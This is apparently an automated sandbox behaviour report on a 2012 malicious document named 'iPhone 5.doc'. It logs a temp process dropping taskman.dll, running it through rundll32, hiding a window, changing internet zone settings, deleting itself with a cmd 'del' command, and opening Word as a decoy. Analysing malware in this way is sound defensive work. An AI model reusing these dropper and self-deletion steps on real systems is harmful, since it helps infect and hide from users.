C:\Documents and Settings\Administrator\Application Data\taskman.dll unknown 61440 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 401471 WriteFile
File Path Offset Length Value Completion Count Source Address Symbol
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activities

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 420000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 420000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 860000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 870000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 870000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 870000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 870000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 870000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 890000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 890000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 8A0000 262144 own pid read write success or wait 1
\KnownDlls\version.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit 8E0000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit 8E0000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit 8E0000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit 8E0000 180224 own pid readonly success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown 8E0000 57344 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit 8F0000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
C:\WINDOWS\system32\ole32.dll write and read and execute commit 940000 1290240 own pid execute success or wait 1
C:\WINDOWS\system32\ole32.dll query and write and read and execute image 774E0000 1302528 own pid read write success or wait 1
C:\WINDOWS\system32\rundll32.exe query and write and read and execute and extend size image 774E0000 1302528 own pid read write success or wait 1
C:\WINDOWS\system32\apphelp.dll write and read and execute commit 8F0000 126976 own pid execute success or wait 1
C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 940000 1208320 own pid readonly success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
C:\WINDOWS\system32\rundll32.exe write and read and execute commit 8F0000 36864 own pid execute success or wait 1
C:\WINDOWS\system32\rundll32.exe query and read commit 8F0000 36864 own pid readonly success or wait 1
C:\WINDOWS\system32\rundll32.exe write and read and execute commit 8F0000 36864 own pid execute success or wait 1
C:\WINDOWS\system32\rundll32.exe query and read commit 8F0000 36864 own pid readonly success or wait 1
C:\WINDOWS\system32\rundll32.exe query and read commit 8F0000 36864 own pid readonly success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 940000 401408 own pid execute success or wait 1
\KnownDlls\netapi32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
\KnownDlls\SETUPAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
C:\WINDOWS\system32\urlmon.dll write and read and execute commit 940000 1212416 own pid execute success or wait 1
C:\WINDOWS\system32\urlmon.dll query and write and read and execute image 78130000 1257472 own pid read write success or wait 1
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1
\BaseNamedObjects\Local\UrlZonesSM_Administrator query and write and read commit unknown unknown unknown unknown object name exists 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit 940000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 940000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit 940000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 940000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and write and read and execute and extend size image 940000 389120 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 940000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit A70000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit A70000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit A70000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit A70000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 940000 389120 own pid readonly success or wait 1

Registry Activities

Key Path Name Type Data Completion Count Source Address Symbol
HKEY_USERS\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\WINDOWS\system32\cmd.exe unicode Windows Command Processor success or wait 1 40178C ShellExecuteExW
Key Path Name Completion Count Source Address Symbol

Mutex Activities

Name Completion Count Source Address Symbol

Process Activities

PID Filepath Cmdline Flags Completion Count Source Address Symbol
760 C:\WINDOWS\system32\rundll32.exe rundll32.exe C:\Documents and Settings\Administrator\Application Data\taskman.dll start none success or wait 1 40187C CreateProcessW
868 C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp > nul none success or wait 1 40178C ShellExecuteExW
PID Process info class Completion Count Source Address Symbol
PID Filepath Completion Count Source Address Symbol
1112 C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp success or wait 1 4012C4 ExitProcess

Thread Activities

TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
TID PID Path Completion Count Source Address Symbol

Memory Activities

PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Protection Completion Count Source Address Symbol
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
1112 C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp 40140B 1000 page execute and read and write page execute read success or wait 2 4030AA VirtualProtect
1112 C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp 40140B 1000 page execute read page execute and read and write success or wait 2 40317B VirtualProtect
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
15:20:20 0 2 0
15:20:21 0 2 0
15:20:23 0 2 0
15:20:24 0 2 0
15:20:39 0 2 0
15:20:40 0 2 0
15:20:41 0 1 0

System Activities

System info class Completion Count Source Address Symbol

Timing Activities

Time Completion Count Source Address Symbol

Windows UI Activities

Window name Class name HWND Completion Count Source Address Symbol
c0d0e0f0g1 c0d0e0f0g1 5013A success 1 4011A6 CreateWindowExA
HWND Completion Count Source Address Symbol
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address Symbol
0 0 false 45C 5013A, 50104, 1, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 2 40178C ShellExecuteExW
HWND Completion Count Source Address Symbol
HWND Command Completion Count Source Address Symbol
5013A hide error 1 4011BA NtUserShowWindow
HWND Message LParam WParam Completion Count Source Address Symbol
TID Message LParam WParam Completion Count Source Address Symbol
Module Thread id Hook code Completion Count Source Address Symbol

Process Token Activities

Status Privilege Completion Count Source Address Symbol

Chronological Activities

Operation Data Completion Time
Window created Window Name: c0d0e0f0g1 Class Name: c0d0e0f0g1 HWND: 5013A success 670993430
Window shown HWND: 5013A CMD: hide error 671089809
Memory attributes changed PID: 1112 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Base: 40140B Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 679596285
Memory attributes changed PID: 1112 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Base: 40140B Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 679604503
File created Path: C:\Documents and Settings\Administrator\Application Data\taskman.dll Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: true success or wait 679604825
File write Path: C:\Documents and Settings\Administrator\Application Data\taskman.dll Offset: unknown Length: 61440 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 679710583
Memory attributes changed PID: 1112 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Base: 40140B Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 679727530
Memory attributes changed PID: 1112 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Base: 40140B Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 679727757
File opened Path: C:\Documents and Settings\Administrator\Application Data\taskman.dll Access: read attributes and synchronize and generic read and generic write Options: sequential only and synchronous io non alert and non directory file Attributes: none Content Overwritten: true success or wait 679737347
File opened Path: C:\WINDOWS\system32\rundll32.exe Access: read attributes and synchronize and generic read Options: sequential only and synchronous io non alert and non directory file Attributes: none Content Overwritten: true success or wait 679738500
Process created PID: 760 Path: C:\WINDOWS\system32\rundll32.exe Cmdline: rundll32.exe C:\Documents and Settings\Administrator\Application Data\taskman.dll start Createflags: none success or wait 679978399
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Personal Type: unicode Data: C:\Documents and Settings\Administrator\My Documents Old data: success or wait 746075690
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0d6ab97b-ade6-11de-bdcc-806d6172696f} Name: BaseClass Type: unicode Data: Drive Old data: success or wait 746173455
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{811e0202-1746-11df-8a4d-806d6172696f} Name: BaseClass Type: unicode Data: Drive Old data: success or wait 746183808
Key value replaced with same Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Common Documents Type: unicode Data: C:\Documents and Settings\All Users\Documents Old data: success or wait 746227227
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Desktop Type: unicode Data: C:\Documents and Settings\Administrator\Desktop Old data: success or wait 746249557
Key value replaced with same Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Common Desktop Type: unicode Data: C:\Documents and Settings\All Users\Desktop Old data: success or wait 746258159
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: ProxyBypass Type: dword Data: 1 Old data: success or wait 746612670
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: IntranetName Type: dword Data: 1 Old data: success or wait 746612964
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: UNCAsIntranet Type: dword Data: 1 Old data: success or wait 746613255
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: AutoDetect Type: dword Data: 1 Old data: success or wait 746613543
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: ProxyBypass Type: dword Data: 1 Old data: success or wait 746623098
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: IntranetName Type: dword Data: 1 Old data: success or wait 746623388
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: UNCAsIntranet Type: dword Data: 1 Old data: success or wait 746623678
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: AutoDetect Type: dword Data: 1 Old data: success or wait 746623964
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Cache Type: unicode Data: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files Old data: success or wait 746634597
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Cookies Type: unicode Data: C:\Documents and Settings\Administrator\Cookies Old data: success or wait 746637426
Key value set Path: HKEY_USERS\Software\Microsoft\Windows\ShellNoRoam\MUICache Name: C:\WINDOWS\system32\cmd.exe Type: unicode Data: Windows Command Processor Old data: success or wait 746679638
Process created PID: 868 Path: C:\WINDOWS\system32\cmd.exe Cmdline: C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp > nul Createflags: none success or wait 746744342
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 45C HWNDs: 5013A, 50104, 1, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 747128616
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 45C HWNDs: 5013A, 50104, 1, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 747129043
Process terminated PID: 1112 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp success or wait 747170804

General

Start time: 15:20:20
Start date: 24/07/2012
Path: C:\WINDOWS\system32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c iPhone 5.doc
Imagebase: 0x4ad00000
File size: 389120 bytes
MD5 hash: 6D778E0F95447E6546553EEEA709D03C

File Activities

File Path Access Options Content overwritten Completion Count Source Address Symbol
File Path Offset Length Value Completion Count Source Address Symbol
File Path Offset Length Value Completion Count Source Address Symbol
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activities

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 340000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 480000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 480000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 490000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 970000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 970000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 440000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 440000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 440000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 970000 618496 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\iPhone 5.doc query and write and read and execute and extend size image unknown unknown unknown unknown invalid image not mz 1
\BaseNamedObjects\ShimSharedMemory write unknown 980000 57344 own pid read write success or wait 1
C:\WINDOWS\system32\apphelp.dll write and read and execute commit 990000 126976 own pid execute success or wait 1
C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 990000 1208320 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\iPhone 5.doc query and read commit 990000 24576 own pid readonly success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 9A0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 9A0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 9B0000 262144 own pid read write success or wait 1
\KnownDlls\netapi32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
\KnownDlls\SETUPAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\msi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msi.dll query and write and read and execute image 7D1E0000 2867200 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE query and write and read and execute and extend size image 7D1E0000 2867200 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE query and read commit 9F0000 12312576 own pid readonly success or wait 1

Registry Activities

Key Path Name Type Old Data New Data Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9040110900063D11C8EF10054038389C\Usage WORDFiles dword 1089994759 1089994760 success or wait 1 4AD13114 ShellExecuteExW
Key Path Name Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DisableUNCCheck object name not found 1 4AD04A2A RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor EnableExtensions success or wait 1 4AD04A4F RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DelayedExpansion object name not found 1 4AD04A88 RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DefaultColor success or wait 1 4AD04AAD RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor CompletionChar success or wait 1 4AD04AE5 RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor PathCompletionChar success or wait 1 4AD04B37 RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor AutoRun success or wait 1 4AD04BB8 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor DisableUNCCheck object name not found 1 4AD04A2A RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor EnableExtensions success or wait 1 4AD04A4F RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor DelayedExpansion object name not found 1 4AD04A88 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor DefaultColor success or wait 1 4AD04AAD RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor CompletionChar success or wait 1 4AD04AE5 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor PathCompletionChar object name not found 1 4AD04B37 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor AutoRun object name not found 1 4AD04BB8 RegQueryValueExW

Mutex Activities

Name Completion Count Source Address Symbol

Process Activities

PID Filepath Cmdline Flags Completion Count Source Address Symbol
900 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE /n /dde none success or wait 1 4AD13114 ShellExecuteExW
PID Process info class Completion Count Source Address Symbol

Thread Activities

TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
TID PID Path Completion Count Source Address Symbol

Memory Activities

PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Protection Completion Count Source Address Symbol
1096 C:\WINDOWS\system32\cmd.exe 970000 13FE10 page read and write success or wait 1 4AD04578 VirtualAlloc
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
15:20:21 1 3 1
15:20:23 1 3 1
15:20:24 2 4 2
15:20:42 2 4 2
15:20:43 2 4 2
15:20:44 2 4 2

System Activities

System info class Completion Count Source Address Symbol

Timing Activities

Time Completion Count Source Address Symbol

Windows UI Activities

Window name Class name HWND Completion Count Source Address Symbol
HWND Completion Count Source Address Symbol
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address Symbol
0 0 false 1A8 A014E, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 2 4AD13114 ShellExecuteExW
0 0 false 1A8 A013E, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 2 4AD13114 ShellExecuteExW
0 0 false 1A8 1, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 2 4AD13114 ShellExecuteExW
HWND Completion Count Source Address Symbol
HWND Message LParam WParam Completion Count Source Address Symbol
Module Thread id Hook code Completion Count Source Address Symbol

Process Token Activities

Status Privilege Completion Count Source Address Symbol

Chronological Activities

Operation Data Completion Time
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DisableUNCCheck object name not found 672486663
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: EnableExtensions success or wait 672487001
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DelayedExpansion object name not found 672487329
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DefaultColor success or wait 672487657
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: CompletionChar success or wait 672487978
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: PathCompletionChar success or wait 672488298
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: AutoRun success or wait 672488618
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: DisableUNCCheck object name not found 672489273
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: EnableExtensions success or wait 672489600
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: DelayedExpansion object name not found 672489922
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: DefaultColor success or wait 672490296
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: CompletionChar success or wait 672490617
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: PathCompletionChar object name not found 672490938
